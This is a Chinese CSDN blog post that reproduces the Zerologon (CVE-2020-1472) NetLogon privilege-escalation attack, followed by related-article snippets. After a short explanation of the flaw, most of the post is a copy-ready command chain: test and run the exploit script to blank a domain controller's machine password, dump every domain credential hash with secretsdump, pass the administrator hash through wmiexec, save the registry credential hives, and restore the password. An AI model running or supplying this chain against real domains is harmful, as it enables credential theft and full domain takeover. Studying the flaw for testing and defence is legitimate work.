【技术分享】NetLogon于域内提权漏洞(CVE-2020-1472)

最新推荐文章于 2024-07-23 14:13:47 发布
最新推荐文章于 2024-07-23 14:13:47 发布
阅读量52 收藏
点赞数
文章标签: android linux mysql adb 安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/annebab/article/details/133826648
版权

一、漏洞介绍

CVE-2020-1472是一个Windows域控中严重的远程权限提升漏洞。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。该漏洞适用于Win2008及后的所有版本。

二、漏洞原理

Netlogon使用的AES认证算法中的vi向量默认为0。这将导致攻击者可以绕过认证,并向域发起Netlogon计算机账户认证请求。攻击者可以使用8字节全0 client challenge 不断尝试,从而得到一个正确的8字节全0 client credential以通过认证,再通过相关调用完成对域控密码的修改。

攻击者只需要定位域控主机名及IP,同时确认可以访问域控,就可以在无需任何凭据的情况下 (可在域外) 取得域管理员的权限。

三、漏洞复现

1、使用工具检测域控是否存在该漏洞。若能返回Success,则说明DC存在漏洞。

python3 zerologon_tester.py 域控计算机名称 域控ip

python3 zerologon_tester.py owa 10.10.10.8


2、使用exploit漏洞脚本重置域控机器账号。

域控计算机名python3 cve-2020-1472-exploit.py

域控ip python3

cve-2020-1472-exploit.py owa 10.10.10.8


3、使用impacket里的脚本和使用DCSync导出域内所有的用户凭证。

python3 secretsdump.py 域/域控计算机名$@域控ip -just-dc -no-pass #linux利用时$需要转义为\$ windows不需要转义 -no-pass 无密码登录 -just-dc. 仅提取NTDS.DIT数据(NTLM哈希和Kerberos键)

python3 secretsdump.py redteam.red/owa\$@10.10.10.8 -just-dc -no-pass


此时,获取到域管的Hash。

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::

4、通过wmic hash进行传递。

python3 wmiexec.py -hashes 账户hash 域/账户名@域控ip python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7 redteam.red/administrator@10.10.10.8


5、为了防止脱域,通过将SAM系统等文件导出到本地,以获取此前在域控制机器上保存的hash值,然后用于进行系统的恢复操作。

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

lget system.save

lget sam.save

lget security.save

下载后,务必删除文件 del /f *.save。


6、通过导出sam.save、security.save和system.save等文件,获取域控制机器上保存的NTLM Hash值,并将其用于密码恢复操作。

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL


7、通过取得$MACHINE.ACC:的值的后半部分或者$MACHINE.ACC:plain_password_hex的值,对其进⾏恢复。

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:b3b0675e639b4efb2980bc22dd05a37e

$MACHINE.ACC:plain_password_hex:781a2beba2659bc7f184086fdf71440c54da34629fda115cabd39cb9e32846df3cf01dca22cc14ec289c867034c9dbc16ccc201f6db3e8dde620e6f4093353708271c00aa5c22974e41f3d7e10bcc809225ae99d1a841dbcf353a0a9ed4c1bf12cbbe5f20771957692632af762469c28aedc7b7d41860a3fd45275abe23eb54ebde6c073d4d96e855969c360c52b8df2a808027e34280cfe6be69082a0a10a5791ac8c1886a60e377562332770ed45e17282472461d5972a3e43ebaf2406033105a40f486ffb54af9e37979e0a75a87c99b08d0ae71beb836f64eca79af84199ed388595f90be931d480fcfc64054c75

注意只取“$MACHINE.ACC: ”的值的后半部分:b3b0675e639b4efb2980bc22dd05a37e

python3 restorepassword.py 域/预控计算机名称@预控计算机名称 --tar-ip 域控ip -hexpass $MACHINE.ACC:的值的后半部分 python3 restorepassword.py redteam.red/owa@owa -target-ip 10.10.10.8 -hexpass 9c786d87f82b46071818e5bda3a9faab


此时可以使用脚本来检测是否已经恢复密码成功。

python3 secretsdump.py redteam.red/owa\$@10.10.10.8 -no-pass -just-dc


此时已⽆法获取到域内所有⽤户凭证 hash,⾄此恢复成功。

漏洞成功利用后,Windows安全日志将以事件ID 4742的形式显示相关信息。

在实际应用环境中,需要务必注意的是,该漏洞利用可能会导致域控制器的账户和密码被清空,进而可能影响域内的运行情况。例如,某些服务可能无法正常运行,甚至可能导致域成员从域中脱离。这是一个严重的问题,需要予以重视。

annebab
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权漏洞系列分析-Zerologon漏洞分析
hakksjss的博客
05-27 815
3.利⽤置零修改域控密码为空,这⼀步会把域控win-3o8g1o8vv2e(即win-3o8g1o8vv2e$⽤户)的密码置为空, hash为31d6cfe0d16ae931b73c59d7e0c089c0,回显两个OK显示成功把密码置零(如图6- 所示),因为机器⽤ 户是不可以登录系统的,但是域控的机器⽤户具备Dcsync特权,我们就可以滥⽤该特权来进⾏Dcsync攻击;图6- 获取域控制服务器的机器账号。图6- 利⽤置零修改域控密码为空。图6- 探测域控是否存在该漏洞
学习笔记-OS - Exploits
人饭子的博客
11-01 557
OS - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 Linux 系统漏洞提权 原生软件提权 系统配置提权 sudo suid 远程漏洞 Windows 系统漏洞提权 远程漏洞 域 其他 FreeBSD OpenBSD Solaris Linux 相关资源 c...
win2008域控计算机用户批量删除域用户管理员权限_原创 | cve20201472提权
weixin_39517202的博客
12-05 333
点击上方蓝字 关注我吧影响攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的 Netlogon 安全通道时,存在特权提升漏洞。当成功利用此漏洞时,攻击者可无需通过身份验证,在网络中的设备上运行经特殊设计的应用程序,获取域控制器的管理员权限。Windows Server, version 2004 (Server Core installation)Windo...
Notes Twenty one days-渗透攻击-红队-权限提升
热门推荐
qq_34801745的博客
10-07 1万+
** Notes Twentieth Day-渗透攻击-红队-权限提升(dayu) ** 作者:大余 时间:2020-10-5 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
w ndows相机控制协议,3gstudent-Blog
weixin_32127359的博客
05-24 173
22 Mar 20210x00 前言 在之前的文章《Exchange Web Service(EWS)开发指南2——SOAP XML message》介绍了SOAP XML message的使用,通过Python实现了利用hash对Exchange资源的访问。 当我们通过SOAP XML message读取邮件时,尝尝会遇到以下麻烦:由于每一封邮件对应一份原始的XML文件,原始的XML文件包含完整...
腾讯安全推出御界NDR「横移检测版」,全面检测域渗透攻击
qcloud_security的博客
11-10 1852
1.背景 一直以来,大量企业饱受域渗透攻击困扰。 由于企业内部资产及用户量庞大,大多数企业选择 AD 域作为用户和主机统一管理的方案,然而由于防护体系不完善,攻击者往往通过攻击域控进而攻击企业内部核心设备,获取企业机密数据。 域渗透不需要经过 ISP 防火墙、出口网关防火墙的审查,而大多数企业往往在网络出口处布置重兵把守,而内网域环境的防护相对来说千疮百孔,传统的安全防护体系(防火墙、IDS)已经不足以抵挡目前的域渗透威胁。 腾讯安全玄武实验室作为顶...
2024护网行动 _ 红队实战手册 (建议收藏)零基础入门到精通
wholeliubei的博客
07-23 558
如果你也想学习:黑客&网络安全的零基础攻防教程。
2024护网行动 | 红队实战手册 (建议收藏)零基础入门到精通
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-23 589
如果你也想学习:黑客&网络安全的零基础攻防教程。
红方人员实战手册
qq_36584013的博客
06-19 1009
红方人员实战手册 声明 Author : By klion Date : 2020.2.15 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备才能把路越走越宽 二来, 也是为秉承共享协作, 希望...
CVE-2020-1472 NetLogon 特权提升漏洞1
08-03
CVE-2020-1472 NetLogon 特权提升漏洞1
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
使用Impacket库测试Zerologon漏洞CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补域控制器后,检测脚本将在发送2000...
CVE-2020-1472:CVE-2020-1472亦称Zerologon的利用代码
03-18
CVE-2020-1472 CVE-2020-1472又称为Zerologon的检查和利用代码 测试域控制器是否容易受到Zerologon攻击,如果容易受到攻击,它将把域控制器的帐户密码重置为空字符串。 注意:它可能会破坏生产环境中的内容(例如...
Zerologon-CVE-2020-1472-master
09-11
【Zerologon-CVE-2020-1472】是2020年发现的一个严重网络安全漏洞,主要影响的是微软的Windows Server操作系统。这个漏洞被命名为"Zerologon",因为它允许攻击者在没有密码或任何身份验证的情况下完全控制网络中的域...
zerologon:RPCTCP和RPCSMB的CVE-2020-1472的测试脚本
05-04
证明CVE-2020-1472可以通过RPC / SMB来完成,而不仅可以通过RPC / TCP来完成。 另外,最终的客户端挑战和客户端凭证中有一个随机字节-用于测试琐碎的IDS签名。 RPC / SMB扫描默认运行。 根据目标服务器的不同,...
Android 一体机等root后的机器指令截屏
csdn_zxw的博客
07-19 351
Android 一体机等root后的机器指令截屏
Android 10.0 蓝牙音乐获取歌手、歌曲等信息功能实现
安卓兼职framework和app工程师的博客
07-22 1513
在10.0的系统rom定制化开发中,在一些功能性开发中,可能会遇到一些蓝牙音乐的项目,所以会要求在手机端获取 蓝牙音乐的歌手歌曲的信息功能,这就需要了解Bluetooth的音乐播放功能,然后实现这些获取歌手信息和歌曲详情的功能
Android DataBinding从入门到精通
Dream的博客
07-22 1029
DataBinding可以更加方便的编写与视图交互的代码。即系统会为模块中的每个xml文件生成一个绑定类,其实例包含指向相应布局中具有ID的所有视图的直接引用。大多数情况下,DataBinding会代替findMyId。
Android 多用户问题
m0_54010212的博客
07-22 229
在工程模式下,可以使用 getInstalledPackages 或 getInstalledPackagesAsUser 方法获取全部已安装的应用程序,并展示给用户。List<MediaController> 在普通应用中可以获取到,但是在systemUI中获取不到。这个api解决 那为什么systemUI在 0这个组别?在systemserver 里启动的组别就是这个。音频mediassion相关是区分用户的。看了一下是 user组别问题导致的。那么还有没有什么是区别用户的。当然有 PMS也是这样。
CVE-2020-1472
08-30
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这使得在攻击者可以控制明文(客户端挑战)和IV等要素的情况下,存在较高的概率生成全零的密文。这个漏洞可能被攻击者利用来远程提升权限,并在Windows域控服务器上执行恶意操作。 为了利用该漏洞,可以使用提供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2020-1472 ZeroLogon漏洞分析利用](https://blog.csdn.net/qq_50854790/article/details/123121372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-1472 NetLogon 权限提升漏洞](https://blog.csdn.net/qq_53579360/article/details/128923909)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值